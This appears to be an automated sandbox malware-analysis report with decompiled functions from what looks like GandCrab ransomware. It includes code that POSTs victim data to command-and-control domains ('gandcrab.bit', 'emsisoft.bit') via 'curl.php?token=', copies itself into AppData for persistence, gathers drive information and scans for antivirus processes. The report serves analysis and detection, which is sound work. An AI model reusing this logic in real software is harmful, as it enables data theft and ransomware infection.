Function 00405370 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 136
stringmemorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E00405370(CHAR* __ecx, CHAR** __edx, intOrPtr _a4) {
				CHAR* _v12;
				void* _v16;
				CHAR** _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				char _v36;
				short _v136;
				char _v1156;
				short _v1160;
				int _t45;
				void* _t53;
				CHAR* _t57;
				CHAR* _t59;
				CHAR* _t60;
				void* _t61;
				void* _t70;
				short _t71;

				_t59 = __ecx;
				_v20 = __edx;
				_v12 = __ecx;
				E004077F0( &_v36);
				_v24 = E00404EB0();
				_t70 = 0x400 + lstrlenA(_t59) * 2;
				_t7 = _t70 + 1; // 0x74cb6981
				_t60 = VirtualAlloc(0, _t7, 0x3000, 0x40);
				_v28 = _t60;
				_v16 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
				if(_t60 == 0) {
					L2:
					_t60 = 0;
					L3:
					lstrcatA(_t60, "data=");
					lstrcatA(_t60, _v12);
					asm("movdqu xmm0, [0x40ffd0]");
					asm("movdqu [ebp-0x84], xmm0");
					asm("movdqu xmm0, [0x40ffe0]");
					asm("movdqu [ebp-0x74], xmm0");
					asm("movdqu xmm0, [0x40fff0]");
					asm("movdqu [ebp-0x64], xmm0");
					asm("movdqu xmm0, [0x410000]");
					asm("movdqu [ebp-0x54], xmm0");
					asm("movdqu xmm0, [0x410010]");
					asm("movdqu [ebp-0x44], xmm0");
					asm("movdqu xmm0, [0x410020]");
					asm("movdqu [ebp-0x34], xmm0");
					lstrlenA(_t60);
					_t71 = 0;
					_v1160 = 0;
					E00408B30( &_v1156, 0, 0x3fc);
					lstrcpyW( &_v1160, L"curl.php?token=");
					E00405270( &_v1160);
					_t45 = lstrlenW( &_v136);
					_t74 = _v16;
					_push(_t45);
					_push( &_v136);
					_push(L"POST");
					_push(0x31fff);
					_push(_v16);
					_push(lstrlenA(_t60));
					_push(_t60);
					_t61 = _v24;
					_push( &_v1160);
					_push(_t61);
					if(E00407A00( &_v36) != 0) {
						_t71 = 1;
						if(_a4 != 0) {
							_v12 = 0;
							if(E00405050(_t74,  &_v12) == 0) {
								_t71 = 0;
							} else {
								_t57 = _v12;
								if(_t57 != 0) {
									 *_v20 = _t57;
								}
							}
						}
					}
					VirtualFree(_t61, 0, 0x8000);
					VirtualFree(_v16, 0, 0x8000);
					VirtualFree(_v28, 0, 0x8000);
					_t53 = _v32;
					if(_t53 != 0) {
						InternetCloseHandle(_t53);
					}
					return _t71;
				}
				_t10 = _t70 + 1; // 0x74cb6981
				if(_t70 < _t10) {
					goto L3;
				}
				goto L2;
			}

0x0040537b
0x0040537d
0x00405384
0x00405387
0x00405392
0x004053a8
0x004053af
0x004053c3
0x004053c7
0x004053cc
0x004053d1
0x004053da
0x004053da
0x004053dc
0x004053e8
0x004053ee
0x004053f0
0x004053f9
0x00405401
0x00405409
0x0040540e
0x00405416
0x0040541b
0x00405423
0x00405428
0x00405430
0x00405435
0x0040543d
0x00405442
0x00405448
0x00405457
0x0040545d
0x00405471
0x0040547d
0x00405489
0x0040548f
0x00405492
0x00405499
0x0040549a
0x004054a2
0x004054a7
0x004054af
0x004054b0
0x004054b1
0x004054ba
0x004054bb
0x004054c6
0x004054cc
0x004054d1
0x004054d6
0x004054e6
0x004054f6
0x004054e8
0x004054e8
0x004054ed
0x004054f2
0x004054f2
0x004054ed
0x004054e6
0x004054d1
0x00405506
0x00405512
0x0040551e
0x00405520
0x00405525
0x00405528
0x00405528
0x00405536
0x00405536
0x004053d3
0x004053d8
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 004077F0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004079D4
Part of subcall function 004077F0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 004079ED

Part of subcall function 00404EB0: VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,74CB6980,00000000,00000000), ref: 00404F22
Part of subcall function 00404EB0: Sleep.KERNEL32(00002710), ref: 00404F4C
Part of subcall function 00404EB0: lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 00404F5A
Part of subcall function 00404EB0: VirtualAlloc.KERNEL32(00000000,00000000), ref: 00404F6A
Part of subcall function 00404EB0: lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 00404F7E
Part of subcall function 00404EB0: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404F8F
Part of subcall function 00404EB0: wsprintfW.USER32 ref: 00404FA7
Part of subcall function 00404EB0: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404FB8

lstrlenA.KERNEL32(00000000,74CB6980,00000000,00000000), ref: 00405395
VirtualAlloc.KERNEL32(00000000,74CB6981,00003000,00000040), ref: 004053B5
VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 004053CA
lstrcatA.KERNEL32(00000000,data=), ref: 004053E8
lstrcatA.KERNEL32(00000000,004056FE), ref: 004053EE
lstrlenA.KERNEL32(00000000), ref: 00405442
_memset.LIBCMT ref: 0040545D
lstrcpyW.KERNEL32 ref: 00405471
lstrlenW.KERNEL32(?), ref: 00405489
lstrlenA.KERNEL32(00000000,?,00031FFF,?,00000000), ref: 004054A9
VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000,?,00000000), ref: 00405506
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 00405512
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 0040551E
InternetCloseHandle.WININET(?), ref: 00405528

Strings

POST, xrefs: 0040549A
curl.php?token=, xrefs: 0040546B
data=, xrefs: 004053E2

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Virtual$Freelstrlen$Alloc$Internet$Openlstrcat$CloseHandleSleep_memsetlstrcmpilstrcpywsprintf
String ID: POST$curl.php?token=$data=
API String ID: 186108914-1715678351
Opcode ID: 5eba2a68d1ef90ccaff39bd68a776efbf0a530b61a350863102a495147ee2029
Instruction ID: 4aa36092560c0acaf7b062926e9d70cdf9a0aa4eca25d73af60562301bb62425
Opcode Fuzzy Hash: 5eba2a68d1ef90ccaff39bd68a776efbf0a530b61a350863102a495147ee2029
Instruction Fuzzy Hash: 54519671E0031A66DB109BA5DD45FEEBB7CFB48300F104176FA44B6191DB786A44CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00402AD0 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 114
stringmemorythreadCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00402AD0() {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				long _v32;
				intOrPtr _v36;
				WCHAR* _t24;
				void* _t27;
				WCHAR* _t33;
				WCHAR* _t38;
				signed int _t40;
				signed int _t46;
				WCHAR* _t50;
				WCHAR* _t54;
				void* _t56;
				WCHAR* _t57;
				void* _t58;
				WCHAR* _t64;
				WCHAR* _t65;
				WCHAR* _t67;
				signed int _t69;
				void* _t71;
				void* _t72;

				_t71 = (_t69 & 0xfffffff8) - 0x1c;
				_t24 = VirtualAlloc(0, 0x800, 0x3000, 0x40);
				_v24 = _t24;
				_t64 = _t24;
				_v32 = 0;
				if(_t24 == 0) {
					_t67 = 0;
					_t50 = 0;
					__eflags = 0;
				} else {
					_t3 =  &(_t24[0x101]); // 0x202
					_t65 = _t3;
					_v32 = 0x404;
					_t50 = _t65;
					_t67 = _t24;
					_t64 =  &(_t65[0x101]);
				}
				_v28 = _t67;
				GetModuleFileNameW(0, _t67, 0x100);
				GetTempPathW(0x100, _t50);
				_t6 =  &(_t50[1]); // 0x204
				_t27 = E00407BA0(_t67, _t6);
				_t75 = _t27;
				if(_t27 == 0) {
					_v20 = 0x520050;
					_v8 = 0;
					_push(0x52);
					_v16 = 0x440049;
					_v12 = 0x520055;
					E00407C60( &_v20, lstrlenW( &_v20));
					_t72 = _t71 + 4;
					GetEnvironmentVariableW(L"AppData", _t50, 0x100);
					_t13 =  &(_t50[1]); // 0x2
					_t54 = _t67;
					_t33 = E00407BA0(_t54, _t13);
					__eflags = _t33;
					if(_t33 == 0) {
						lstrcatW(_t50, L"\\Microsoft\\");
						lstrcatW(_t50,  &_v20);
						lstrcatW(_t50, L".exe");
						_push(_t54);
						_t38 = E00402890(_v28, _t50);
						_t72 = _t72 + 4;
						__eflags = _t38;
						if(_t38 == 0) {
							goto L17;
						}
						_t40 = lstrlenW(_t50);
						__eflags = _v28;
						_t56 = 0xa + _t40 * 2;
						if(_v28 == 0) {
							L13:
							_t64 = 0;
							__eflags = 0;
							L14:
							_push(_t50);
							L15:
							wsprintfW(_t64, L"\"%s\"");
							_t57 = _t64;
							goto L16;
						}
						__eflags = _v36 + _t56 - 0x800;
						if(__eflags < 0) {
							goto L14;
						}
						goto L13;
					}
					_t46 = lstrlenW(_t67);
					__eflags = _v28;
					_t58 = 0xa + _t46 * 2;
					if(_v28 == 0) {
						L8:
						_t64 = 0;
						__eflags = 0;
						L9:
						_push(_t67);
						goto L15;
					}
					__eflags = _v36 + _t58 - 0x800;
					if(__eflags < 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t57 = _t67;
					L16:
					E00402960(_t57, _t75);
					L17:
					ExitThread(0);
				}
			}

APIs

VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 00402AEA
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 00402B2C
GetTempPathW.KERNEL32(00000100,00000000), ref: 00402B38
lstrlenW.KERNEL32(?,?,?,00000052), ref: 00402B7D

Part of subcall function 00407C60: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 00407C7D
Part of subcall function 00407C60: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00407CAB
Part of subcall function 00407C60: GetModuleHandleA.KERNEL32(?), ref: 00407CFF
Part of subcall function 00407C60: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00407D0D
Part of subcall function 00407C60: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00407D1C
Part of subcall function 00407C60: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407D65
Part of subcall function 00407C60: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00407D73

GetEnvironmentVariableW.KERNEL32(AppData,00000000,00000100), ref: 00402B9C
lstrcatW.KERNEL32(00000000,\Microsoft\), ref: 00402BE4
lstrcatW.KERNEL32(00000000,?), ref: 00402BEC
lstrcatW.KERNEL32(00000000,.exe), ref: 00402BF4
wsprintfW.USER32 ref: 00402C35
ExitThread.KERNEL32 ref: 00402C47

Strings

I, xrefs: 00402B6C
U, xrefs: 00402B75
.exe, xrefs: 00402BEE
AppData, xrefs: 00402B97
"%s", xrefs: 00402C2F
\Microsoft\, xrefs: 00402BDE
P, xrefs: 00402B55

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Virtuallstrcat$AllocContextCryptModule$AcquireAddressEnvironmentExitFileFreeHandleLibraryLoadNamePathProcReleaseTempThreadVariablelstrlenwsprintf
String ID: "%s"$.exe$AppData$I$P$U$\Microsoft\
API String ID: 139215849-2398311915
Opcode ID: 8f2a0bd0de482528f1caf89761174d1ff230737b866bf32f99a3677a47c9b2f2
Instruction ID: 1f7025583fece4150ab6efb2fb4095bab450847bdb3333ccf3c22af7b910d208
Opcode Fuzzy Hash: 8f2a0bd0de482528f1caf89761174d1ff230737b866bf32f99a3677a47c9b2f2
Instruction Fuzzy Hash: 0841A771204311ABE304EF219E4DB5F77A8AF84704F04443EB555B62D2DBB8A908CBAF

Uniqueness

Uniqueness Score: -1.00%

Function 00407369 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 123
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00407369(signed int __eax, intOrPtr __edx, void* __esi) {
				signed int _t51;
				signed int _t56;
				void* _t58;
				long _t59;
				void* _t75;
				signed int _t77;
				signed int _t80;
				intOrPtr _t85;
				WCHAR* _t88;
				intOrPtr _t93;
				signed int _t95;
				intOrPtr _t100;
				void* _t102;
				void* _t104;
				void* _t106;

				_t102 = __esi;
				_t93 = __edx;
				_t51 = __eax;
				do {
					 *(_t104 - 0x24) =  *((intOrPtr*)(_t104 + _t51 * 2 - 0x80));
					_t95 = GetDriveTypeW(_t104 - 0x24);
					if(_t95 <= 2 || _t95 == 5) {
						L6:
					} else {
						 *((short*)(_t104 - 0x20)) = 0;
						lstrcatW( *(_t102 + 0x7c), _t104 - 0x24);
						 *((short*)(_t104 - 0x20)) = 0x5c;
						lstrcatW( *(_t102 + 0x7c),  *(_t104 + _t95 * 4 - 0x40));
						lstrcatW( *(_t102 + 0x7c), "_");
						if(GetDiskFreeSpaceW(_t104 - 0x24, _t104 - 0x1c, _t104 - 0x14, _t104 - 0xc, _t104 - 0x10) == 0) {
							lstrcatW( *(_t102 + 0x7c), L"0,");
							goto L6;
						} else {
							 *((intOrPtr*)(_t104 - 8)) = E00408470( *(_t104 - 0x10), 0,  *(_t104 - 0x1c) *  *(_t104 - 0x14), 0);
							_t85 = _t93;
							_t75 = E00408470( *(_t104 - 0xc), 0,  *(_t104 - 0x1c) *  *(_t104 - 0x14), 0);
							_t100 =  *((intOrPtr*)(_t104 - 8));
							 *((intOrPtr*)(_t104 - 4)) = _t100 - _t75;
							asm("sbb eax, edx");
							 *((intOrPtr*)(_t104 - 8)) = _t85;
							_t77 = lstrlenW( *(_t102 + 0x7c));
							_push(_t85);
							wsprintfW( &(( *(_t102 + 0x7c))[_t77]), L"%I64u/", _t100);
							_t80 = lstrlenW( *(_t102 + 0x7c));
							_push( *((intOrPtr*)(_t104 - 8)));
							wsprintfW( &(( *(_t102 + 0x7c))[_t80]), L"%I64u",  *((intOrPtr*)(_t104 - 4)));
							_t106 = _t106 + 0x20;
							lstrcatW( *(_t102 + 0x7c), ",");
						}
					}
					_t51 =  *(_t104 - 0x18) + 1;
					 *(_t104 - 0x18) = _t51;
				} while (_t51 < 0x1b);
				_t56 = lstrlenW( *(_t102 + 0x7c));
				_t88 =  *(_t102 + 0x7c);
				 *((short*)(_t88 + _t56 * 2 - 2)) = 0;
				if( *(_t102 + 0x80) != 0) {
					_t58 = VirtualAlloc(0, 0x81, 0x3000, 4);
					 *(_t102 + 0x84) = _t58;
					if(_t58 == 0) {
						L13:
						 *(_t102 + 0x80) = 0;
					} else {
						_push(_t88);
						_t59 = E004068F0(_t58);
						if(_t59 == 0) {
							VirtualFree( *(_t102 + 0x84), _t59, 0x8000);
							goto L13;
						}
					}
				}
				return 1;
			}

0x00407369
0x00407369
0x00407369
0x00407370
0x00407375
0x00407383
0x00407388
0x0040747b
0x00407397
0x00407399
0x004073a4
0x004073b2
0x004073b6
0x004073c0
0x004073de
0x00407479
0x00000000
0x004073e4
0x00407400
0x00407403
0x00407405
0x0040740a
0x00407416
0x00407419
0x0040741b
0x0040741e
0x00407427
0x00407438
0x00407446
0x00407448
0x0040745a
0x00407462
0x0040746d
0x0040746d
0x004073de
0x00407484
0x00407485
0x00407488
0x00407494
0x00407496
0x0040749b
0x004074a7
0x004074b7
0x004074bd
0x004074c5
0x004074e4
0x004074e4
0x004074c7
0x004074c7
0x004074c9
0x004074d0
0x004074de
0x00000000
0x004074de
0x004074d0
0x004074c5
0x004074f9

APIs

GetDriveTypeW.KERNEL32(?), ref: 0040737D
lstrcatW.KERNEL32(?,?), ref: 004073A4
lstrcatW.KERNEL32(?,0041073C), ref: 004073B6
lstrcatW.KERNEL32(?,004107B0), ref: 004073C0
GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00404590), ref: 004073D6
lstrlenW.KERNEL32(?,00000000,00000000,?,00000000,00404590,00000000,?,00000000), ref: 0040741E
wsprintfW.USER32 ref: 00407438
lstrlenW.KERNEL32(?), ref: 00407446
wsprintfW.USER32 ref: 0040745A
lstrcatW.KERNEL32(?,004107D0), ref: 0040746D
lstrcatW.KERNEL32(?,004107D4), ref: 00407479
lstrlenW.KERNEL32(?), ref: 00407494
VirtualAlloc.KERNEL32(00000000,00000081,00003000,00000004), ref: 004074B7
VirtualFree.KERNEL32(?,00000000,00008000,00000000), ref: 004074DE

Strings

%I64u, xrefs: 00407451
%I64u/, xrefs: 00407432

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$FreeVirtualwsprintf$AllocDiskDriveSpaceType
String ID: %I64u$%I64u/
API String ID: 1496313530-2450085969
Opcode ID: f37d999d73b9fcab265fb1937d7ee25b9929f392ff6dfbe524c0eec2842da8f8
Instruction ID: f56a49131db2d010194e37aaef5b9fe43e36d368a28beff8943d66c84b1e197f
Opcode Fuzzy Hash: f37d999d73b9fcab265fb1937d7ee25b9929f392ff6dfbe524c0eec2842da8f8
Instruction Fuzzy Hash: A4418371A00608AFDB219BA4CD45FAEBBF9FF48300F10442AE655F32A1DA35F950CB19

Uniqueness

Uniqueness Score: -1.00%

Function 00404EB0 Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 84
memorystringsleepCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00404EB0() {
				intOrPtr _v8;
				char* _v12;
				char* _v16;
				char* _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				char _v56;
				char _v72;
				WCHAR* _t26;
				long _t33;
				WCHAR* _t38;
				signed int _t40;
				signed int _t41;
				void* _t46;
				signed int _t50;
				void* _t52;

				asm("movdqa xmm0, [0x410960]");
				_v20 =  &_v72;
				_v16 =  &_v36;
				_v36 = 0x69736d65;
				_v32 = 0x74666f73;
				_v28 = 0x7469622e;
				_v24 = 0;
				asm("movdqu [ebp-0x44], xmm0");
				_v56 = 0;
				_v52 = 0x646e6167;
				_v48 = 0x62617263;
				_v44 = 0x7469622e;
				_v40 = 0;
				_v12 =  &_v52;
				_t26 = VirtualAlloc(0, 0x100, 0x3000, 4);
				_t38 = _t26;
				if(_t38 != 0) {
					_t40 = 0;
					_t50 = 0;
					while(1) {
						_v8 =  *((intOrPtr*)(_t52 + _t50 * 4 - 0x10));
						_t50 =  ==  ? 0 : _t50 + 1;
						if(_t40 == 0xffffffff) {
							Sleep(0x2710);
						}
						_t46 = VirtualAlloc(0, 2 + lstrlenW(_t38) * 2, 0x3000, 4);
						_t41 = _t46;
						E00404D60(_t41, _v8);
						_t33 = lstrcmpiA(_t46, "fabian wosar <3");
						if(_t33 != 0) {
							break;
						}
						VirtualFree(_t46, _t33, 0x8000);
						_t40 = _t41 | 0xffffffff;
					}
					wsprintfW(_t38, L"%S", _t46);
					VirtualFree(_t46, 0, 0x8000);
					_t26 = _t38;
				}
				return _t26;
			}

0x00404eb6
0x00404ecc
0x00404ed7
0x00404ee4
0x00404eeb
0x00404ef2
0x00404ef9
0x00404efd
0x00404f02
0x00404f06
0x00404f0d
0x00404f14
0x00404f1b
0x00404f1f
0x00404f22
0x00404f24
0x00404f28
0x00404f2e
0x00404f30
0x00404f32
0x00404f37
0x00404f3f
0x00404f45
0x00404f4c
0x00404f4c
0x00404f6f
0x00404f71
0x00404f73
0x00404f7e
0x00404f86
0x00000000
0x00000000
0x00404f8f
0x00404f9b
0x00404f9b
0x00404fa7
0x00404fb8
0x00404fbe
0x00404fbe
0x00404fc6

APIs

VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,74CB6980,00000000,00000000), ref: 00404F22
Sleep.KERNEL32(00002710), ref: 00404F4C
lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 00404F5A
VirtualAlloc.KERNEL32(00000000,00000000), ref: 00404F6A
lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 00404F7E
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404F8F
wsprintfW.USER32 ref: 00404FA7
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404FB8

Strings

.bit, xrefs: 00404F14
soft, xrefs: 00404EEB
gand, xrefs: 00404F06
emsi, xrefs: 00404EE4
crab, xrefs: 00404F0D
.bit, xrefs: 00404EF2
fabian wosar <3, xrefs: 00404F78

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree$Sleeplstrcmpilstrlenwsprintf
String ID: .bit$.bit$crab$emsi$fabian wosar <3$gand$soft
API String ID: 2709691373-1090818981
Opcode ID: edd6b09a321c72d76f54713700b51503e045287bd620de7e5e9023b5f02d4a1f
Instruction ID: 12e809f3953ca4ef3e333bd49a631b39bc1f07fb3bc4506d08caa0eda9158355
Opcode Fuzzy Hash: edd6b09a321c72d76f54713700b51503e045287bd620de7e5e9023b5f02d4a1f
Instruction Fuzzy Hash: 34317AB1A04319ABDB11DFA4AD45BAEBBB8FB84710F10013AF701B72D1D7B45905CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00407520 Relevance: 25.6, APIs: 17, Instructions: 150
memorystringprocessCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00407520(void** _a4, intOrPtr* _a8) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				WCHAR* _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				WCHAR* _v72;
				WCHAR* _v76;
				WCHAR* _v80;
				void* _t46;
				void* _t49;
				WCHAR* _t56;
				void** _t68;
				void* _t75;
				long _t76;
				WCHAR* _t77;
				signed int _t79;
				void* _t83;

				_t46 = VirtualAlloc(0, 0x400, 0x3000, 4);
				_t68 = _a4;
				 *_t68 = _t46;
				_v80 = L"AVP.EXE";
				_v76 = L"ekrn.exe";
				_v72 = L"avgnt.exe";
				_v68 = L"ashDisp.exe";
				_v64 = L"NortonAntiBot.exe";
				_v60 = L"Mcshield.exe";
				_v56 = L"avengine.exe";
				_v52 = L"cmdagent.exe";
				_v48 = L"smc.exe";
				_v44 = L"persfw.exe";
				_v40 = L"pccpfw.exe";
				_v36 = L"fsguiexe.exe";
				_v32 = L"cfp.exe";
				_v28 = L"msmpeng.exe";
				_t75 = VirtualAlloc(0, 4, 0x3000, 4);
				_v24 = _t75;
				if(_t75 == 0) {
					L3:
					return 0;
				} else {
					 *_t75 = 0x22c;
					_t49 = CreateToolhelp32Snapshot(2, 0);
					_v20 = _t49;
					if(_t49 != 0xffffffff) {
						_t79 = 0;
						_push(_t75);
						_v12 = 0;
						_a4 = 0;
						_v16 = 0;
						_v8 = 0;
						if(Process32FirstW(_t49) != 0) {
							L6:
							while(_t79 == 0) {
								_t77 = _t75 + 0x24;
								while(lstrcmpiW( *(_t83 + _t79 * 4 - 0x4c), _t77) != 0) {
									_t79 = _t79 + 1;
									if(_t79 < 0xe) {
										continue;
									} else {
										_t79 = _v8;
									}
									L15:
									_t75 = _v24;
									if(Process32NextW(_v20, _t75) != 0 && GetLastError() != 0x12) {
										goto L6;
									}
									goto L17;
								}
								_push(_t77);
								_push( *_t68);
								_v16 = 1;
								if(_a4 != 0) {
									lstrcatW();
									lstrcatW( *_t68, ",");
								} else {
									lstrcpyW();
									lstrcatW( *_t68, ",");
								}
								_a4 =  &(_a4[0]);
								_v12 = _v12 + lstrlenW(_t77) * 2;
								_t79 =  >  ? 1 : _v8;
								_v8 = _t79;
								goto L15;
							}
							L17:
							if(_v16 != 0) {
								_t56 =  *_t68;
								if( *_t56 != 0) {
									 *((short*)( *_t68 + lstrlenW(_t56) * 2 - 2)) = 0;
								}
							}
							 *_a8 = _v12;
						}
						VirtualFree(_t75, 0, 0x8000);
						CloseHandle(_v20);
						_t76 = _v16;
						if(_t76 == 0) {
							VirtualFree( *_t68, _t76, 0x8000);
						}
						return _t76;
					} else {
						VirtualFree(_t75, 0, 0x8000);
						goto L3;
					}
				}
			}

0x0040753d
0x0040753f
0x0040754d
0x0040754f
0x00407556
0x0040755d
0x00407564
0x0040756b
0x00407572
0x00407579
0x00407580
0x00407587
0x0040758e
0x00407595
0x0040759c
0x004075a3
0x004075aa
0x004075b3
0x004075b5
0x004075ba
0x004075e4
0x004075ea
0x004075bc
0x004075c0
0x004075c6
0x004075cc
0x004075d2
0x004075ef
0x004075f1
0x004075f3
0x004075f6
0x004075f9
0x004075fc
0x00407607
0x00000000
0x00407610
0x00407618
0x00407620
0x0040762f
0x00407633
0x00000000
0x00407635
0x00407635
0x00407635
0x00407697
0x00407697
0x004076a6
0x00000000
0x00000000
0x00000000
0x004076a6
0x0040763e
0x0040763f
0x00407641
0x00407648
0x00407665
0x0040766e
0x0040764a
0x0040764a
0x00407657
0x00407657
0x00407670
0x0040768e
0x00407691
0x00407694
0x00000000
0x00407694
0x004076b7
0x004076bb
0x004076bd
0x004076c3
0x004076d0
0x004076d0
0x004076c3
0x004076db
0x004076db
0x004076eb
0x004076f0
0x004076f6
0x004076fb
0x00407705
0x00407705
0x0040770f
0x004075d4
0x004075dc
0x00000000
0x004075dc
0x004075d2

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,74CB66A0,?,7491C0B0), ref: 0040753D
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 004075B1
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004075C6
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004075DC
Process32FirstW.KERNEL32(00000000,00000000), ref: 004075FF
lstrcmpiW.KERNEL32(004107DC,-00000024), ref: 00407625
Process32NextW.KERNEL32(?,?), ref: 0040769E
GetLastError.KERNEL32 ref: 004076A8
lstrlenW.KERNEL32(00000000), ref: 004076C6
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004076EB
CloseHandle.KERNEL32(?), ref: 004076F0
VirtualFree.KERNEL32(?,?,00008000), ref: 00407705

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Virtual$Free$AllocProcess32$CloseCreateErrorFirstHandleLastNextSnapshotToolhelp32lstrcmpilstrlen
String ID:
API String ID: 2470459410-0
Opcode ID: 3f4a2b444d341badbc1f89ef671cf3f23f637359728da17f4d75482f5b004914
